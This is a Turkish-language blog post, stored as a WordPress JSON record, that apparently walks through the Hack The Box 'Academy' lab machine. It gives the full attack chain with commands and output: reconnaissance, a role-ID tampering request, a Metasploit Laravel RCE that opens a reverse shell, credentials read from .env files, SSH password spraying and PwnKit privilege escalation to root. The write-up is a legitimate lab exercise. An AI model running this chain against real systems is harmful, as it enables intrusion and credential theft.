{"id":2068,"date":"2023-03-28T15:58:04","date_gmt":"2023-03-28T15:58:04","guid":{"rendered":"https:\/\/berenkudaygorun.com\/blog\/?p=2068"},"modified":"2023-03-28T16:05:42","modified_gmt":"2023-03-28T16:05:42","slug":"academy","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2023\/03\/28\/academy\/","title":{"rendered":"Academy"},"content":{"rendered":"<blockquote>\n<p>\u015e\u00fcphesiz ki sizi biraz korku ve a\u00e7l\u0131k, ayr\u0131ca mallardan, canlardan ve \u00fcr\u00fcnlerden azatma fakirlik ile imtihan edece\u011fiz. Sabredenlere m\u00fcjdele...<br \/>\nBakara 177<\/p>\n<\/blockquote>\n<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.com\/machines\/Academy\" title=\"Academy\">Academy<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.com\/storage\/avatars\/10c8da0b46f53c882da946668dcdab95.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap<\/p>\n<pre><code class=\"language-sh\">nmap -p 22,80,33060 -A -T4 10.10.10.215\nStarting Nmap 7.93 ( https:\/\/nmap.org ) at 2023-03-13 14:21 +03\nNmap scan report for academy.htb (10.10.10.215)\nHost is up (0.22s latency).\n\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 c090a3d835256ffa3306cf8013a0a553 (RSA)\n|   256 2ad54bd046f0edc93c8df65dabae7796 (ECDSA)\n|_  256 e16414c3cc51b23ba628a7b1ae5f4535 (ED25519)\n80\/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: Hack The Box Academy\n33060\/tcp open  mysqlx?\n| fingerprint-strings: \n|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: \n|     Invalid message&quot;\n|_    HY000\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port33060-TCP:V=7.93%I=7%D=3\/13%Time=640F0729%P=x86_64-pc-linux-gnu%r(N\nSF:ULL,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(GenericLines,9,&quot;\\x05\\0\\0\\0\\x0b\\\nSF:x08\\x05\\x1a\\0&quot;)%r(GetRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(HTTPOp\nSF:tions,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(RTSPRequest,9,&quot;\\x05\\0\\0\\0\\x0b\nSF:\\x08\\x05\\x1a\\0&quot;)%r(RPCCheck,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(DNSVers\nSF:ionBindReqTCP,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(DNSStatusRequestTCP,2\nSF:B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fI\nSF:nvalid\\x20message\\&quot;\\x05HY000&quot;)%r(Help,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)\nSF:%r(SSLSessionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\nSF:\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000&quot;)%r(TerminalServerCookie\nSF:,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(TLSSessionReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x\nSF:08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\nSF:\\x05HY000&quot;)%r(Kerberos,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(SMBProgNeg,9\nSF:,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(X11Probe,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\\nSF:x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY0\nSF:00&quot;)%r(FourOhFourRequest,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LPDString,\nSF:9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LDAPSearchReq,2B,&quot;\\x05\\0\\0\\0\\x0b\\x0\nSF:8\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\\nSF:x05HY000&quot;)%r(LDAPBindReq,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(SIPOptions\nSF:,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(LANDesk-RC,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x\nSF:05\\x1a\\0&quot;)%r(TerminalServer,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(NCP,9,&quot;\nSF:\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(NotesRPC,2B,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1\nSF:a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\x05HY000\nSF:&quot;)%r(JavaRMI,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(WMSRequest,9,&quot;\\x05\\0\\0\nSF:\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(oracle-tns,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r\nSF:(ms-sql-s,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;)%r(afp,2B,&quot;\\x05\\0\\0\\0\\x0b\\x0\nSF:8\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#039;\\x1a\\x0fInvalid\\x20message\\&quot;\\\nSF:x05HY000&quot;)%r(giop,9,&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;);\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 22\/tcp)\nHOP RTT       ADDRESS\n1   206.81 ms 10.10.14.1\n2   206.90 ms academy.htb (10.10.10.215)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 61.55 \n<\/code><\/pre>\n<p>Web sitesini bulduktan sonra fuff ile dosya dizin ke\u015ffi yapmaya kaar verdim. academy.htb domain ifadesini internet sitesinden alm\u0131\u015ft\u0131m. \/etc\/hosts dosyam\u0131 g\u00fcncelledim ve taramay\u0131 ba\u015flatt\u0131m. Ne zaman domain bulsam subdomian'de taramas\u0131 yapar\u0131m ancak subdomain taramas\u0131nda bir sonu\u00e7 alamad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root\u327fARCELIK-RED-TEAM)-[\/tmp]\n\u2514\u2500# ffuf -u http:\/\/academy.htb\/FUZZ -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -e .php,.html,.txt -t 100 -c -fs 2117\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.0.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/academy.htb\/FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt\n :: Extensions       : .php .html .txt \n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 100\n :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500\n :: Filter           : Response size: 2117\n________________________________________________\n\n[Status: 302, Size: 55034, Words: 4001, Lines: 1050, Duration: 244ms]\n    * FUZZ: home.php\n\n[Status: 200, Size: 2627, Words: 667, Lines: 142, Duration: 228ms]\n    * FUZZ: login.php\n\n[Status: 200, Size: 3003, Words: 801, Lines: 149, Duration: 234ms]\n    * FUZZ: register.php\n\n[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 4657ms]\n    * FUZZ: .php\n\n[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 5660ms]\n    * FUZZ: .html\n\n[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 5681ms]\n    * FUZZ: images\n\n[Status: 200, Size: 2633, Words: 668, Lines: 142, Duration: 227ms]\n    * FUZZ: admin.php\n\n[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 250ms]\n    * FUZZ: config.php\n\n[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 223ms]\n    * FUZZ: .php\n\n[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 223ms]\n    * FUZZ: .html\n\n[Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 236ms]\n    * FUZZ: server-status\n\n[WARN] Caught keyboard interrupt (Ctrl-C)\n<\/code><\/pre>\n<p>Sayfada bira gezindim kay\u0131t olabiliyordum ve ama pek bir \u015fey yapama\u0131yodum, kay\u0131t olurken ilgin\u00e7 bir alan ke\u015ffettim. Kay\u0131t olurken roleid de\u011feri 0 larak setlenmi\u015fti bunu bir olarak de\u011fi\u015ftirip tekrardan kay\u0131t olmay\u0131 denedim ve farkl\u0131 bir sayfaya gitti\u011fimi g\u00f6rd\u00fcm. \u0130\u015fte kay\u0131t olurken kulland\u0131\u011f\u0131m http paketi:<\/p>\n<pre><code>POST \/register.php HTTP\/1.1\nHost: academy.htb\nContent-Length: 47\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/academy.htb\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.5481.178 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/academy.htb\/register.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=5hn6kt6c1ajp3at1q5ga022djr\nConnection: close\n\nroleid=1&amp;uid=beren&amp;password=beren&amp;confirm=beren<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/rsim1.png\" alt=\"\" width=\"100%\" height=\"auto\" \/><\/p>\n<p><strong>dev-staging-01.academy.htb<\/strong> bilgisini hemen hosts dosyama ekledim ve bu sayfaya gittim. Sayfaya gitti\u011fimde bir larevel oldu\u011funu g\u00f6rd\u00fcm ve direkt olara asl\u0131nda .env dosyas\u0131 kar\u015fma \u00e7\u0131k\u0131yordu. Bunun \u00fczerine Laravel ile ilgili exploitleri aramaya ba\u015flad\u0131m.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/laravel.png\" alt=\"\" width=\"100%\" height=\"auto\" class=\"aligncenter size-full wp-image-2070\" srcset=\"https:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/laravel.png 1912w, https:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/laravel-768x434.png 768w, https:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/laravel-1536x868.png 1536w\" sizes=\"(max-width: 1912px) 100vw, 1912px\" \/><br \/>\n<img decoding=\"async\" src=\"http:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/cve.png\" alt=\"\" width=\"100%\" height=\"auto\" class=\"aligncenter size-full wp-image-2071\" srcset=\"https:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/cve.png 1497w, https:\/\/berenkudaygorun.com\/blog\/wp-content\/uploads\/2023\/03\/cve-768x416.png 768w\" sizes=\"(max-width: 1497px) 100vw, 1497px\" \/><\/p>\n<p>S\u0131ras\u0131yla buradaki exploitleri msfconsole \u00fczerinde aramaya ba\u015flad\u0131m.<\/p>\n<pre><code class=\"language-sh\">msfconsole\n\n     ,           ,\n    \/             \\\n   ((__---,,,---__))\n      (_) O O (_)_________\n         \\ _ \/            |\\\n          o_o \\   M S F   | \\\n               \\   _____  |  *\n                |||   WW|||\n                |||     |||\n\n       =[ metasploit v6.2.26-dev                          ]\n+ -- --=[ 2264 exploits - 1190 auxiliary - 404 post       ]\n+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit tip: Set the current module&#039;s RHOSTS with \ndatabase values using hosts -R or services \n-R\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 &gt; search cve:2022-2886\n[-] No results from search\nmsf6 &gt; search cve:2022-2870\n[-] No results from search\nmsf6 &gt; search cve:2021-21263\n[-] No results from search\nmsf6 &gt; search cve:2020-24941\n[-] No results from search\nmsf6 &gt; search cve:2018-15133\n\nMatching Modules\n================\n\n   #  Name                                              Disclosure Date  Rank       Check  Description\n   -  ----                                              ---------------  ----       -----  -----------\n   0  exploit\/unix\/http\/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution\n\nInteract with a module by name or index. For example info 0, use 0 or use exploit\/unix\/http\/laravel_token_unserialize_exec\n\nmsf6 &gt; <\/code><\/pre>\n<p>Buldu\u011fum exploiti internette ara\u015ft\u0131rd\u0131m ve denedim.<\/p>\n<pre><code class=\"language-sh\">msf6 exploit(unix\/http\/laravel_token_unserialize_exec) &gt; show options \n\nModule options (exploit\/unix\/http\/laravel_token_unserialize_exec):\n\n   Name       Current Setting                               Required  Description\n   ----       ---------------                               --------  -----------\n   APP_KEY    dBLUaMuZz7Iq06XtL\/Xnz\/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file\n   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS     10.10.10.215                                  yes       The target host(s), see https:\/\/github.com\/rapid7\/metasploit-framework\/wiki\/Using-Metasploit\n   RPORT      80                                            yes       The target port (TCP)\n   SSL        false                                         no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/                                             yes       Path to target webapp\n   VHOST      dev-staging-01.academy.htb                    no        HTTP server virtual host\n\nPayload options (cmd\/unix\/reverse_perl):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.10.14.22      yes       The listen address (an interface may be specified)\n   LPORT  443              yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/http\/laravel_token_unserialize_exec) &gt; exploit \n\n[*] Started reverse TCP handler on 10.10.14.22:443 \n[*] Command shell session 4 opened (10.10.14.22:443 -&gt; 10.10.10.215:46598) at 2023-03-28 16:01:23 +0300<\/code><\/pre>\n<p>Makineye ba\u011fland\u0131ktan sonra baz\u0131 credentiallar buldum.<\/p>\n<pre><code class=\"language-sh\">www-data@academy:\/var\/www\/html\/academy$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\nwww-data@academy:\/var\/www\/html\/academy$ cat .env\ncat .env\nAPP_NAME=Laravel\nAPP_ENV=local\nAPP_KEY=base64:dBLUaMuZz7Iq06XtL\/Xnz\/90Ejq+DEEynggqubHWFj0=\nAPP_DEBUG=false\nAPP_URL=http:\/\/localhost\n\nLOG_CHANNEL=stack\n\nDB_CONNECTION=mysql\nDB_HOST=127.0.0.1\nDB_PORT=3306\nDB_DATABASE=academy\nDB_USERNAME=dev\nDB_PASSWORD=mySup3rP4s5w0rd!!\n\nBROADCAST_DRIVER=log\nCACHE_DRIVER=file\nSESSION_DRIVER=file\nSESSION_LIFETIME=120\nQUEUE_DRIVER=sync\n\nREDIS_HOST=127.0.0.1\nREDIS_PASSWORD=null\nREDIS_PORT=6379\n\nMAIL_DRIVER=smtp\nMAIL_HOST=smtp.mailtrap.io\nMAIL_PORT=2525\nMAIL_USERNAME=null\nMAIL_PASSWORD=null\nMAIL_ENCRYPTION=null\n\nPUSHER_APP_ID=\nPUSHER_APP_KEY=\nPUSHER_APP_SECRET=\nPUSHER_APP_CLUSTER=mt1\n\nMIX_PUSHER_APP_KEY=&quot;${PUSHER_APP_KEY}&quot;\nMIX_PUSHER_APP_CLUSTER=&quot;${PUSHER_APP_CLUSTER}&quot;\n\nwww-data@academy:\/var\/www\/html\/htb-academy-dev-01$ cat .env\ncat .env\nAPP_NAME=Laravel\nAPP_ENV=local\nAPP_KEY=base64:dBLUaMuZz7Iq06XtL\/Xnz\/90Ejq+DEEynggqubHWFj0=\nAPP_DEBUG=true\nAPP_URL=http:\/\/localhost\n\nLOG_CHANNEL=stack\n\nDB_CONNECTION=mysql\nDB_HOST=127.0.0.1\nDB_PORT=3306\nDB_DATABASE=homestead\nDB_USERNAME=homestead\nDB_PASSWORD=secret\n\nBROADCAST_DRIVER=log\nCACHE_DRIVER=file\nSESSION_DRIVER=file\nSESSION_LIFETIME=120\nQUEUE_DRIVER=sync\n\nREDIS_HOST=127.0.0.1\nREDIS_PASSWORD=null\nREDIS_PORT=6379\n\nMAIL_DRIVER=smtp\nMAIL_HOST=smtp.mailtrap.io\nMAIL_PORT=2525\nMAIL_USERNAME=null\nMAIL_PASSWORD=null\nMAIL_ENCRYPTION=null\n\nPUSHER_APP_ID=\nPUSHER_APP_KEY=\nPUSHER_APP_SECRET=\nPUSHER_APP_CLUSTER=mt1\n\nMIX_PUSHER_APP_KEY=&quot;${PUSHER_APP_KEY}&quot;\nMIX_PUSHER_APP_CLUSTER=&quot;${PUSHER_APP_CLUSTER}&quot;<\/code><\/pre>\n<p>\/home klas\u00f6r\u00fcne gidip mevcut kullan\u0131c\u0131lar\u0131n bilgilerini ald\u0131m ve ssh brute ba\u015flatt\u0131m.<\/p>\n<pre><code class=\"language-sh\">www-data@academy:\/home$ ls\nls\ntotal 32\ndrwxr-xr-x  8 root     root     4096 Aug 10  2020 .\ndrwxr-xr-x 20 root     root     4096 Feb 10  2021 ..\ndrwxr-xr-x  2 21y4d    21y4d    4096 Aug 10  2020 21y4d\ndrwxr-xr-x  2 ch4p     ch4p     4096 Aug 10  2020 ch4p\ndrwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 cry0l1t3\ndrwxr-xr-x  3 egre55   egre55   4096 Aug 10  2020 egre55\ndrwxr-xr-x  2 g0blin   g0blin   4096 Aug 10  2020 g0blin\ndrwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12  2020 mrb3n<\/code><\/pre>\n<pre><code class=\"language-sh\">crackmapexec ssh 10.10.10.215 -u users -p passwords\nSSH         10.10.10.215    22     10.10.10.215     [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1\nSSH         10.10.10.215    22     10.10.10.215     [-] 21y4d:homestead Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] 21y4d:secret Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] 21y4d:mySup3rP4s5w0rd!! Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] 21y4d:academy Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] ch4p:homestead Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] ch4p:secret Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] ch4p:mySup3rP4s5w0rd!! Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] ch4p:academy Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] cry0l1t3:homestead Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [-] cry0l1t3:secret Authentication failed.\nSSH         10.10.10.215    22     10.10.10.215     [+] cry0l1t3:mySup3rP4s5w0rd!! \n<\/code><\/pre>\n<p>B\u00f6ylece ilk flagi okudum.<\/p>\n<pre><code class=\"language-sh\">ssh cry0l1t3@10.10.10.215\ncry0l1t3@10.10.10.215&#039;s password: \nWelcome to Ubuntu 20.04.1 LTS (GNU\/Linux 5.4.0-52-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Tue 28 Mar 2023 01:44:49 PM UTC\n\n  System load:             0.0\n  Usage of \/:              37.8% of 13.72GB\n  Memory usage:            24%\n  Swap usage:              0%\n  Processes:               239\n  Users logged in:         0\n  IPv4 address for ens160: 10.10.10.215\n  IPv6 address for ens160: dead:beef::250:56ff:feb9:e4e6\n\n89 updates can be installed immediately.\n42 of these updates are security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nFailed to connect to https:\/\/changelogs.ubuntu.com\/meta-release-lts. Check your Internet connection or proxy settings\n\nLast login: Wed Aug 12 21:58:45 2020 from 10.10.14.2\n$ id\nuid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)\n$ ls\nuser.txt\n$ cat user.txt\n8b8c9674b80280f44b5a35cdc3700602<\/code><\/pre>\n<p>\u0130\u00e7eride linpeas.sh gibi \u00e7e\u015fitli scriptler \u00e7al\u0131\u015ft\u0131rd\u0131m ve cve buldum birka\u00e7kere daha sonras\u0131nda bular\u0131 exploit suggester ile de test ettim. A\u015fa\u011f\u0131daki zafiyetler tespit edildi.<\/p>\n<pre><code class=\"language-sh\">exploit\/linux\/local\/cve_2021_3493_overlayfs:\nexploit\/linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec:\nexploit\/linux\/local\/cve_2022_0995_watch_queue:\nexploit\/linux\/local\/su_login:\nexploit\/linux\/local\/ubuntu_enlightenment_mount_priv_esc:<\/code><\/pre>\n<p>Hedef makinede bir meterpreter ba\u015flatt\u0131m, session'umu bakground'a at\u0131p ilgili exploitleri denemeye ba\u015flad\u0131m. Garip bir \u015fekilde exploit fail etsede meterpreter root shell elde edbildim. A\u015fa\u0131da ayr\u0131nt\u0131lar\u0131 mevcut.<\/p>\n<pre><code class=\"language-sh\">smsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; set session 1                                                                                                                                                                  \nsession =&gt; 1                                                                                                                                                                                                                                \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; set lhost 10.10.14.22                                                                                                                                                           \nlhost =&gt; 10.10.14.22                                                                                                                                                                                                                        \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; set lport 443                                                                                    \nlport =&gt; 443                                                                                                          \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; exploit                                                                    \n\n[*] Started reverse TCP handler on 10.10.14.22:443                                                                                     \n[*] Running automatic check (&quot;set AutoCheck false&quot; to disable)                                                        \n^C[-] Exploit failed [user-interrupt]: Interrupt \n[-] exploit: Interrupted                                                                                              \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; set autocheck false                                                                              \nautocheck =&gt; false                                                                                                    \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; exploit                                                                    \n\n[*] Started reverse TCP handler on 10.10.14.22:443                                                                    \n[!] AutoCheck is disabled, proceeding with exploitation                                                                                \n[*] Writing &#039;\/tmp\/.jebqbvylbqi\/yjalol\/yjalol.so&#039; (548 bytes) ...                                                                       \n[!] Verify cleanup of \/tmp\/.jebqbvylbqi                                                                               \n[*] Sending stage (3045348 bytes) to 10.10.10.215          \n[+] Deleted \/tmp\/.jebqbvylbqi\/yjalol\/yjalol.so                                                                        \n[+] Deleted \/tmp\/.jebqbvylbqi\/.sjfgkae                             \n[+] Deleted \/tmp\/.jebqbvylbqi                              \n[*] Meterpreter session 2 opened (10.10.14.22:443 -&gt; 10.10.10.215:44758) at 2023-03-28 18:22:21 +0300                                                        \n[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.                                           \n[-] exploit: Interrupted               \nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; sessions                                                                                         \n\nActive sessions                       \n===============              \n\n  Id  Name  Type                      Information          Connection                                                 \n  --  ----  ----                      -----------          ----------                                                                  \n  1         meterpreter python\/linux  cry0l1t3 @ academy   10.10.14.22:4444 -&gt; 10.10.10.215:39386 (10.10.10.215)      \n  2         meterpreter x64\/linux     root @ 10.10.10.215  10.10.14.22:443 -&gt; 10.10.10.215:44758 (10.10.10.215)                                              \n\nmsf6 exploit(linux\/local\/cve_2021_4034_pwnkit_lpe_pkexec) &gt; sessions 2                                                                                       \n[*] Starting interaction with 2...                                            \n\nmeterpreter &gt; shell                                                           \nProcess 2282 created.                                                         \nChannel 1 created.                                                            \nid                                                                            \nuid=0(root) gid=0(root) groups=0(root),4(adm),1002(cry0l1t3)                                                                                                 \ncd \/root                                                                      \nls                                                                            \nacademy.txt                                                                   \nroot.txt                                                                      \nsnap                                                                          \ncat root.txt                                                                  \n6f07a193a4068439b60e5db25b84c9d3                                              <\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u015e\u00fcphesiz ki sizi biraz korku ve a\u00e7l\u0131k, ayr\u0131ca mallardan, canlardan ve \u00fcr\u00fcnlerden azatma fakirlik ile imtihan edece\u011fiz. Sabredenlere m\u00fcjdele&#8230; Bakara 177 Makine Ad\u0131 Seviye OS&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2023\/03\/28\/academy\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Academy<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58,498],"tags":[683],"class_list":["post-2068","post","type-post","status-publish","format-standard","hentry","category-php","category-walkthrough","tag-laravel","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=2068"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2068\/revisions"}],"predecessor-version":[{"id":2074,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/2068\/revisions\/2074"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=2068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=2068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=2068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}